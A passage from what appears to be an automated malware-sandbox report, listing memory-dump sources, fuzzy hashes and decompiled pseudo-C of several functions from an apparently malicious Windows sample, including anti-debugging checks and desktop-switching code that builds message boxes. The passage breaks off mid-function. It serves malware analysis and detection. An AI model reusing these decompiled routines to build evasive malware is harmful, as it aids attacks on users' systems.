                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CriticalSection$AdaptersInfoInitialize$Delete_malloc
                                                                                                        • String ID: 2dw
                                                                                                        • API String ID: 3929486883-3142033029
                                                                                                        • Opcode ID: a17b241364bc8ee85b4d671d7e0c64c515f5627a0c59af15b6d918ff8b756315
                                                                                                        • Instruction ID: 8396a63c6efd932a34edbd92c1a521cd1ff6eb308999f150f150de0feaf15261
                                                                                                        • Opcode Fuzzy Hash: a17b241364bc8ee85b4d671d7e0c64c515f5627a0c59af15b6d918ff8b756315
                                                                                                        • Instruction Fuzzy Hash: 5971F470404288AEDF24DF68C895AEE3BB4BF15314F24451FFA0697291DB38ED84CB69
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00534A9B, Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 005451ED
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00545202
                                                                                                        • UnhandledExceptionFilter.KERNEL32(0075E8D4), ref: 0054520D
                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00545229
                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00545230
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                        • String ID:
                                                                                                        • API String ID: 2579439406-0
                                                                                                        • Opcode ID: 54291d387d8f923362384cd566d257d405ec737790e422d607dee19f889210b2
                                                                                                        • Instruction ID: 63aae3b6df92d8d3c0fcbcda29cd1453f17e630902528dc46f969ab43ab429da
                                                                                                        • Opcode Fuzzy Hash: 54291d387d8f923362384cd566d257d405ec737790e422d607dee19f889210b2
                                                                                                        • Instruction Fuzzy Hash: 6021B2B4401204EFD759EF68FD496453BB4FB08305F58601BF50A96371E7B95984CF8A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70981C90, Relevance: 6.1, APIs: 4, Instructions: 69memorynativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 57%
                                                                                                        			E70981C90(intOrPtr _a4) {
				long _v4;
				intOrPtr* _t24;
				intOrPtr _t30;
				signed int _t37;
				intOrPtr _t39;
				void* _t40;

				_t39 = _a4;
				_t40 = 1;
				if(_t39 == 0 ||  *((intOrPtr*)(_t39 + 4)) != 0x3c ||  *((intOrPtr*)(_t39 + 0xc)) == 0) {
					L14:
					return 0;
				} else {
					_t30 = _t39 + 0x10;
					_a4 = _t30;
					if( *((intOrPtr*)(_t39 + 0x10)) == 0) {
						goto L14;
					} else {
						if( *(_t39 + 0x1c) != 0) {
							_t37 = 0;
							if( *((intOrPtr*)(_t39 + 0x20)) > 0) {
								do {
									FreeLibrary( *( *(_t39 + 0x1c) + _t37 * 4));
									_t37 = _t37 + 1;
								} while (_t37 <  *((intOrPtr*)(_t39 + 0x20)));
								_t30 = _a4;
							}
							HeapFree(GetProcessHeap(), 0,  *(_t39 + 0x1c));
						}
						if(( *(_t39 + 8) & 0x00000001) == 0) {
							_t24 =  *((intOrPtr*)(_t39 + 0x14));
							if(_t24 != 0) {
								_t40 =  *_t24( *((intOrPtr*)(_t39 + 0xc)), 0, 0);
							}
						}
						_push(0x8000);
						_push( &_v4);
						_push(_t30);
						_push(0xffffffff);
						_v4 = 0;
						L7098BEEA();
						return _t40;
					}
				}
			}









                                                                                                        0x70981c94
                                                                                                        0x70981c98
                                                                                                        0x70981c9f
                                                                                                        0x70981d43
                                                                                                        0x70981d47
                                                                                                        0x70981cb9
                                                                                                        0x70981cbd
                                                                                                        0x70981cc0
                                                                                                        0x70981cc4
                                                                                                        0x00000000
                                                                                                        0x70981cc6
                                                                                                        0x70981cca
                                                                                                        0x70981ccd
                                                                                                        0x70981cd2
                                                                                                        0x70981ce0
                                                                                                        0x70981ce7
                                                                                                        0x70981ce9
                                                                                                        0x70981cea
                                                                                                        0x70981cef
                                                                                                        0x70981cef
                                                                                                        0x70981d00
                                                                                                        0x70981d06
                                                                                                        0x70981d0b
                                                                                                        0x70981d0d
                                                                                                        0x70981d12
                                                                                                        0x70981d1e
                                                                                                        0x70981d1e
                                                                                                        0x70981d12
                                                                                                        0x70981d20
                                                                                                        0x70981d29
                                                                                                        0x70981d2a
                                                                                                        0x70981d2b
                                                                                                        0x70981d2d
                                                                                                        0x70981d35
                                                                                                        0x70981d40
                                                                                                        0x70981d40
                                                                                                        0x70981cc4

                                                                                                        APIs
                                                                                                        • FreeLibrary.KERNEL32 ref: 70981CE7
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 70981CF9
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70981D00
                                                                                                        • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 70981D35
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Free$Heap$LibraryMemoryProcessVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1020761401-0
                                                                                                        • Opcode ID: fe0abcf666cbc0e1a596add02492a94035dd4756498a7b4b71e7987c8b2bf6ac
                                                                                                        • Instruction ID: b529c28dcb418d12dd0c2841a39bdb07d22bd39d0a79f578887e7081dc4cd822
                                                                                                        • Opcode Fuzzy Hash: fe0abcf666cbc0e1a596add02492a94035dd4756498a7b4b71e7987c8b2bf6ac
                                                                                                        • Instruction Fuzzy Hash: D52138B2214704DFE720CE54D880B6BB3ADBB84755F104A2DE596867C0C770F848CBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 006F605B, Relevance: 1.5, APIs: 1, Instructions: 13encryptionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CryptReleaseContext.ADVAPI32(02785C68,00000000), ref: 006F606B
                                                                                                          • Part of subcall function 00533B15: __lock.LIBCMT ref: 0053479F
                                                                                                          • Part of subcall function 00533B15: ___sbh_find_block.LIBCMT ref: 005347AA
                                                                                                          • Part of subcall function 00533B15: ___sbh_free_block.LIBCMT ref: 005347B9
                                                                                                          • Part of subcall function 00533B15: HeapFree.KERNEL32(00000000,?,007D55F8,0000000C,0054311C,00000000,?,00000000,005406A9,00539730,00000001,00542E13,?,00000000), ref: 005347E9
                                                                                                          • Part of subcall function 00533B15: GetLastError.KERNEL32(?,00000000,005406A9,00539730,00000001,00542E13,?,00000000,?,?,?,?,00542F25,?,0054292D), ref: 005347FA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ContextCryptErrorFreeHeapLastRelease___sbh_find_block___sbh_free_block__lock
                                                                                                        • String ID:
                                                                                                        • API String ID: 3059529010-0
                                                                                                        • Opcode ID: 8bec220d461001e188778b2cda65a8b6716c6995eef8c2fb51c09acc25a4d741
                                                                                                        • Instruction ID: a28f9624261ed1cc92e274a0c8a16e20ac6c084fd537040876df22b151789737
                                                                                                        • Opcode Fuzzy Hash: 8bec220d461001e188778b2cda65a8b6716c6995eef8c2fb51c09acc25a4d741
                                                                                                        • Instruction Fuzzy Hash: 4AC08C323052206FF7212B38FC05FA63BE9FF42311F140066F600D62A0DF109D418698
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098A180, Relevance: 87.8, APIs: 49, Strings: 1, Instructions: 325memorywindowsleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 86%
                                                                                                        			E7098A180() {
				intOrPtr _v56;
				short _v544;
				short _v552;
				void* _v564;
				WCHAR* _v568;
				void* _v572;
				WCHAR* _v576;
				WCHAR* _v580;
				char _v604;
				char* _v608;
				intOrPtr _v612;
				WCHAR* _v620;
				void* _v624;
				void* _v628;
				void* _v636;
				void* _v640;
				void* _v644;
				void* _v648;
				void* _v652;
				void* _v656;
				void* _v660;
				char _v664;
				struct HINSTANCE__* _v668;
				int _v684;
				void* _v688;
				short _v692;
				short _v696;
				struct HDESK__* _t62;
				short* _t72;
				PWCHAR* _t73;
				WCHAR* _t76;
				WCHAR* _t112;
				WCHAR* _t119;
				void* _t123;
				WCHAR* _t124;
				WCHAR* _t125;
				struct HDESK__* _t126;
				struct HDESK__* _t127;
				struct HDESK__* _t134;
				intOrPtr _t136;
				struct HINSTANCE__* _t142;
				void* _t145;
				struct HINSTANCE__* _t146;
				WCHAR* _t147;
				WCHAR* _t148;
				WCHAR* _t149;
				WCHAR* _t150;
				WCHAR* _t151;
				WCHAR* _t152;
				WCHAR* _t155;
				void* _t156;
				void* _t157;
				void* _t158;

				_t62 =  *0x7098f530; // 0x0
				SwitchDesktop(_t62);
				_t126 =  *0x7098f530; // 0x0
				SetThreadDesktop(_t126);
				__imp__CoInitializeEx(0, 6);
				_t146 = LoadLibraryW(StrChrW(0x7098cf30, 0x63));
				_v668 = _t146;
				if(_t146 == 0) {
					L39:
					__imp__CoUninitialize();
					_t127 =  *0x7098f534; // 0x0
					SwitchDesktop(_t127);
					_t134 =  *0x7098f534; // 0x0
					SetThreadDesktop(_t134);
					return 0;
				}
				_push(0xff000000);
				_push(1);
				_push( &_v664);
				_push(_t146);
				_v664 = 0xc590294f;
				_v660 = 0;
				_v656 = 0;
				_v652 = 0;
				E70981E40();
				_t157 = _t156 + 0x10;
				if(_v652 != 0) {
					_t72 = GetCommandLineW();
					_v684 = 0;
					_t73 = CommandLineToArgvW(_t72,  &_v684);
					_v688 = _t73;
					if(_t73 != 0) {
						if(_v692 > 3) {
							_t76 = StrChrW(0x7098cf18, 0x44);
							_t136 =  *0x7098f578; // 0xa51cc8
							_push(_t76);
							_push(_t136);
							wsprintfW( &_v552, StrChrW(0x7098c658, 0x25));
							_t158 = _t157 + 0x10;
							_t142 = LoadLibraryExW( &_v544, 0, 0x20);
							if(_t142 != 0) {
								_t145 = HeapAlloc(GetProcessHeap(), 8, 0x1770);
								if(_t145 != 0) {
									_t23 = _t145 + 0x190; // 0x190
									_t147 = _t23;
									if(LoadStringW(_t142, 0x79, _t147, 0xc8) > 0) {
										_v620 = _t147;
									}
									_t25 = _t145 + 0x320; // 0x320
									_t148 = _t25;
									if(LoadStringW(_t142, 0x7c, _t148, 0x3e8) > 0) {
										_t119 = StrChrW(_t148, 0xa);
										if(_t119 != 0) {
											_v620 =  &(_t119[1]);
										}
									}
									_t27 = _t145 + 0xaf0; // 0xaf0
									_t149 = _t27;
									if(FormatMessageW(0xaff, _t142, 0x50000001, 0, _t149, 0x64, 0) != 0) {
										_v568 = _t149;
									}
									_t29 = _t145 + 0xbb8; // 0xbb8
									_t150 = _t29;
									if(LoadStringW(_t142, 0x1b0, _t150, 0x64) > 0) {
										_t30 = _t145 + 0xc80; // 0xc80
										if(LoadStringW(_t142, 0xf6, _t30, 0x64) > 0) {
											_t31 = _t145 + 0xc80; // 0xc80
											_v652 = _t31;
											_v664 = 1;
											_v660 = _t150;
											_v656 = 8;
											_v612 = 2;
											_v604 = 1;
											_v608 =  &_v664;
										}
									}
									_t40 = _t145 + 0xd48; // 0xd48
									_t151 = _t40;
									if(LoadStringW(_t142, 0x7e, _t151, 0x64) > 0) {
										_v576 = _t151;
									}
									_t42 = _t145 + 0xe10; // 0xe10
									_t152 = _t42;
									if(LoadStringW(_t142, 0x7f, _t152, 0x64) > 0) {
										_v580 = _t152;
									}
									_t44 = _t145 + 0xed8; // 0xed8
									if(LoadStringW(_t142, 0x81, _t44, 0xc8) > 0) {
										PathBuildRootW( &_v692, PathGetDriveNumberW( &_v552));
										_t47 = _t145 + 0x1068; // 0x1068
										_t125 = _t47;
										GetVolumeInformationW( &_v696, _t125, 0x64, 0, 0, 0, 0, 0);
										_v692 = 0;
										_t50 = _t145 + 0x1130; // 0x1130
										_t155 = _t50;
										if( *_t125 != 0) {
											_t112 = _t125;
										} else {
											_t112 = StrChrW(0x7098cf08, 0x3c);
										}
										_t52 = _t145 + 0xed8; // 0xed8
										wsprintfW(_t155, _t52,  &_v696, _t112);
										_t158 = _t158 + 0x10;
										_v580 = _t155;
									}
									_t123 = HeapAlloc(GetProcessHeap(), 0, 0x20a);
									if(_t123 != 0) {
										wsprintfW(_t123, StrChrW(0x7098ced0, 0x2f));
										E7098A0B0(0, 0x83f2, _t123);
										_v684( &_v664, 0, 0, 0, 0, 0,  *((intOrPtr*)(_v696 + 0xc)), 5);
										HeapFree(GetProcessHeap(), 0, _t123);
										if(_v56 != 0) {
											Sleep(0x1f4);
											E70989B10(0);
										}
										Sleep(0x1f4);
									}
									if(FormatMessageW(0xaff, _t142, 0xb0000002, 0, _t145, 0x1f4, 0) != 0) {
										_t59 = _t145 + 0x3e8; // 0x3e8
										_t124 = _t59;
										if(FormatMessageW(0xaff, _t142, 0x50000004, 0, _t124, 0x64, 0) != 0) {
											MessageBoxW(0, _t145, _t124, 0x40);
											Sleep(0x1f4);
										}
									}
									HeapFree(GetProcessHeap(), 0, _t145);
									_t146 = _v684;
								}
								FreeLibrary(_t142);
							}
						}
						LocalFree(_v688);
					}
				}
				FreeLibrary(_t146);
				goto L39;
			}
























































                                                                                                        0x7098a186
                                                                                                        0x7098a18f
                                                                                                        0x7098a195
                                                                                                        0x7098a19c
                                                                                                        0x7098a1a7
                                                                                                        0x7098a1c3
                                                                                                        0x7098a1c5
                                                                                                        0x7098a1cb
                                                                                                        0x7098a592
                                                                                                        0x7098a592
                                                                                                        0x7098a598
                                                                                                        0x7098a59f
                                                                                                        0x7098a5a5
                                                                                                        0x7098a5ac
                                                                                                        0x7098a5bd
                                                                                                        0x7098a5bd
                                                                                                        0x7098a1d1
                                                                                                        0x7098a1d6
                                                                                                        0x7098a1dc
                                                                                                        0x7098a1dd
                                                                                                        0x7098a1de
                                                                                                        0x7098a1e6
                                                                                                        0x7098a1ea
                                                                                                        0x7098a1ee
                                                                                                        0x7098a1f2
                                                                                                        0x7098a1f7
                                                                                                        0x7098a1fe
                                                                                                        0x7098a204
                                                                                                        0x7098a210
                                                                                                        0x7098a214
                                                                                                        0x7098a21a
                                                                                                        0x7098a220
                                                                                                        0x7098a22b
                                                                                                        0x7098a239
                                                                                                        0x7098a23b
                                                                                                        0x7098a241
                                                                                                        0x7098a242
                                                                                                        0x7098a255
                                                                                                        0x7098a25b
                                                                                                        0x7098a26f
                                                                                                        0x7098a273
                                                                                                        0x7098a28d
                                                                                                        0x7098a291
                                                                                                        0x7098a2f7
                                                                                                        0x7098a2f7
                                                                                                        0x7098a305
                                                                                                        0x7098a307
                                                                                                        0x7098a307
                                                                                                        0x7098a310
                                                                                                        0x7098a310
                                                                                                        0x7098a31e
                                                                                                        0x7098a323
                                                                                                        0x7098a32b
                                                                                                        0x7098a330
                                                                                                        0x7098a330
                                                                                                        0x7098a32b
                                                                                                        0x7098a338
                                                                                                        0x7098a338
                                                                                                        0x7098a354
                                                                                                        0x7098a356
                                                                                                        0x7098a356
                                                                                                        0x7098a35f
                                                                                                        0x7098a35f
                                                                                                        0x7098a370
                                                                                                        0x7098a374
                                                                                                        0x7098a385
                                                                                                        0x7098a387
                                                                                                        0x7098a392
                                                                                                        0x7098a39a
                                                                                                        0x7098a39e
                                                                                                        0x7098a3a2
                                                                                                        0x7098a3aa
                                                                                                        0x7098a3b2
                                                                                                        0x7098a3b6
                                                                                                        0x7098a3b6
                                                                                                        0x7098a385
                                                                                                        0x7098a3bc
                                                                                                        0x7098a3bc
                                                                                                        0x7098a3ca
                                                                                                        0x7098a3cc
                                                                                                        0x7098a3cc
                                                                                                        0x7098a3d5
                                                                                                        0x7098a3d5
                                                                                                        0x7098a3e3
                                                                                                        0x7098a3e5
                                                                                                        0x7098a3e5
                                                                                                        0x7098a3f1
                                                                                                        0x7098a402
                                                                                                        0x7098a418
                                                                                                        0x7098a42a
                                                                                                        0x7098a42a
                                                                                                        0x7098a436
                                                                                                        0x7098a43e
                                                                                                        0x7098a443
                                                                                                        0x7098a443
                                                                                                        0x7098a44c
                                                                                                        0x7098a45d
                                                                                                        0x7098a44e
                                                                                                        0x7098a455
                                                                                                        0x7098a455
                                                                                                        0x7098a465
                                                                                                        0x7098a46d
                                                                                                        0x7098a473
                                                                                                        0x7098a476
                                                                                                        0x7098a476
                                                                                                        0x7098a493
                                                                                                        0x7098a497
                                                                                                        0x7098a4b2
                                                                                                        0x7098a4c7
                                                                                                        0x7098a4d7
                                                                                                        0x7098a4e1
                                                                                                        0x7098a4ef
                                                                                                        0x7098a4f6
                                                                                                        0x7098a4fe
                                                                                                        0x7098a4fe
                                                                                                        0x7098a508
                                                                                                        0x7098a508
                                                                                                        0x7098a52d
                                                                                                        0x7098a533
                                                                                                        0x7098a533
                                                                                                        0x7098a54b
                                                                                                        0x7098a553
                                                                                                        0x7098a55e
                                                                                                        0x7098a55e
                                                                                                        0x7098a54b
                                                                                                        0x7098a56e
                                                                                                        0x7098a574
                                                                                                        0x7098a574
                                                                                                        0x7098a579
                                                                                                        0x7098a579
                                                                                                        0x7098a57f
                                                                                                        0x7098a585
                                                                                                        0x7098a585
                                                                                                        0x7098a220
                                                                                                        0x7098a58c
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • SwitchDesktop.USER32(00000000), ref: 7098A18F
                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 7098A19C
                                                                                                        • CoInitializeEx.OLE32(00000000,00000006), ref: 7098A1A7
                                                                                                        • StrChrW.SHLWAPI(7098CF30,00000063), ref: 7098A1BA
                                                                                                        • LoadLibraryW.KERNEL32(00000000), ref: 7098A1BD
                                                                                                        • GetCommandLineW.KERNEL32(FF000000), ref: 7098A204
                                                                                                        • CommandLineToArgvW.SHELL32(00000000,?), ref: 7098A214
                                                                                                        • StrChrW.SHLWAPI(7098CF18,00000044), ref: 7098A239
                                                                                                        • StrChrW.SHLWAPI(7098C658,00000025,00A51CC8,00000000), ref: 7098A24A
                                                                                                        • wsprintfW.USER32 ref: 7098A255
                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000020), ref: 7098A269
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00001770), ref: 7098A280
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 7098A287
                                                                                                        • RtlZeroMemory.NTDLL(?,00000060), ref: 7098A29E
                                                                                                        • LoadStringW.USER32 ref: 7098A2E8
                                                                                                        • LoadStringW.USER32(00000000,00000079,00000190,000000C8), ref: 7098A301
                                                                                                        • LoadStringW.USER32(00000000,0000007C,00000320,000003E8), ref: 7098A31A
                                                                                                        • StrChrW.SHLWAPI(00000320,0000000A), ref: 7098A323
                                                                                                        • FormatMessageW.KERNEL32(00000AFF,00000000,50000001,00000000,00000AF0,00000064,00000000), ref: 7098A34C
                                                                                                        • LoadStringW.USER32(00000000,000001B0,00000BB8,00000064), ref: 7098A36C
                                                                                                        • LoadStringW.USER32(00000000,000000F6,00000C80,00000064), ref: 7098A381
                                                                                                        • LoadStringW.USER32(00000000,0000007E,00000D48,00000064), ref: 7098A3C6
                                                                                                        • LoadStringW.USER32(00000000,0000007F,00000E10,00000064), ref: 7098A3DF
                                                                                                        • LoadStringW.USER32(00000000,00000081,00000ED8,000000C8), ref: 7098A3FE
                                                                                                        • PathGetDriveNumberW.SHLWAPI(?), ref: 7098A40C
                                                                                                        • PathBuildRootW.SHLWAPI(?,00000000), ref: 7098A418
                                                                                                        • GetVolumeInformationW.KERNEL32(?,00001068,00000064,00000000,00000000,00000000,00000000,00000000), ref: 7098A436
                                                                                                        • StrChrW.SHLWAPI(7098CF08,0000003C), ref: 7098A455
                                                                                                        • wsprintfW.USER32 ref: 7098A46D
                                                                                                        • GetProcessHeap.KERNEL32(00000000,0000020A), ref: 7098A48A
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 7098A48D
                                                                                                        • StrChrW.SHLWAPI(7098CED0,0000002F,?,00000005), ref: 7098A4AA
                                                                                                        • wsprintfW.USER32 ref: 7098A4B2
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 7098A4DE
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 7098A4E1
                                                                                                        • Sleep.KERNEL32(000001F4), ref: 7098A4F6
                                                                                                        • Sleep.KERNEL32(000001F4), ref: 7098A508
                                                                                                        • FormatMessageW.KERNEL32(00000AFF,00000000,B0000002,00000000,00000000,000001F4,00000000), ref: 7098A529
                                                                                                        • FormatMessageW.KERNEL32(00000AFF,00000000,50000004,00000000,000003E8,00000064,00000000), ref: 7098A547
                                                                                                        • MessageBoxW.USER32(00000000,00000000,000003E8,00000040), ref: 7098A553
                                                                                                        • Sleep.KERNEL32(000001F4), ref: 7098A55E
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 7098A567
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 7098A56E
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 7098A579
                                                                                                        • LocalFree.KERNEL32(?), ref: 7098A585
                                                                                                        • FreeLibrary.KERNEL32(00000000,FF000000), ref: 7098A58C
                                                                                                        • CoUninitialize.OLE32 ref: 7098A592
                                                                                                        • SwitchDesktop.USER32(00000000), ref: 7098A59F
                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 7098A5AC
                                                                                                          • Part of subcall function 70981E40: lstrlenA.KERNEL32(00000100,00000100,00000000,?,?,?,?,?,70989143), ref: 70981ECE
                                                                                                          • Part of subcall function 70981E40: RtlComputeCrc32.NTDLL ref: 70981ED8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Load$HeapString$Free$DesktopLibraryMessageProcess$FormatSleepwsprintf$AllocCommandLinePathSwitchThread$ArgvBuildComputeCrc32DriveInformationInitializeLocalMemoryNumberRootUninitializeVolumeZerolstrlen
                                                                                                        • String ID: `
                                                                                                        • API String ID: 3812327194-2679148245
                                                                                                        • Opcode ID: b29ede43413f09188b6bb49822197d3d6701347c08be78f704d0279a4300435d
                                                                                                        • Instruction ID: 5982bb585ace1dc2b9303fdde0bf14b0db2445a3e9ce2612a22edd66701da070
                                                                                                        • Opcode Fuzzy Hash: b29ede43413f09188b6bb49822197d3d6701347c08be78f704d0279a4300435d
                                                                                                        • Instruction Fuzzy Hash: 40B171B2258305AFF3209FA1CC89F6F7BACEB44B40F10482DF756962D0DBB494449B26
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70989B10, Relevance: 77.3, APIs: 39, Strings: 5, Instructions: 349memorysleeplibraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 48%
                                                                                                        			E70989B10(intOrPtr _a4) {
				intOrPtr _v4;
				signed int _v72;
				char _v1028;
				short _v1036;
				char _v1048;
				void* _v1556;
				short _v1560;
				void* _v1564;
				intOrPtr _v1568;
				void* _v1572;
				void* _v1576;
				void* _v1580;
				intOrPtr _v1584;
				void* _v1588;
				void* _v1592;
				void* _v1596;
				intOrPtr _v1600;
				void* _v1604;
				void* _v1608;
				void* _v1612;
				char _v1616;
				WCHAR* _v1628;
				short* _v1632;
				char _v1636;
				void* _v1640;
				intOrPtr _v1644;
				void* _v1652;
				intOrPtr _v1656;
				struct HINSTANCE__* _v1660;
				void* _v1664;
				char _v1672;
				char _v1676;
				void* _v1680;
				long _v1684;
				long _v1692;
				long _v1696;
				long _v1708;
				intOrPtr _v1712;
				long _v1716;
				intOrPtr _v1732;
				char _v1740;
				char _v1756;
				intOrPtr _v1760;
				intOrPtr _v1768;
				intOrPtr _v1784;
				void* _v1792;
				intOrPtr _v1804;
				void* _v1816;
				intOrPtr _t93;
				void* _t94;
				void* _t99;
				WCHAR* _t106;
				intOrPtr _t110;
				void* _t133;
				int _t141;
				signed int _t146;
				struct HDESK__* _t150;
				void* _t153;
				struct HINSTANCE__* _t155;
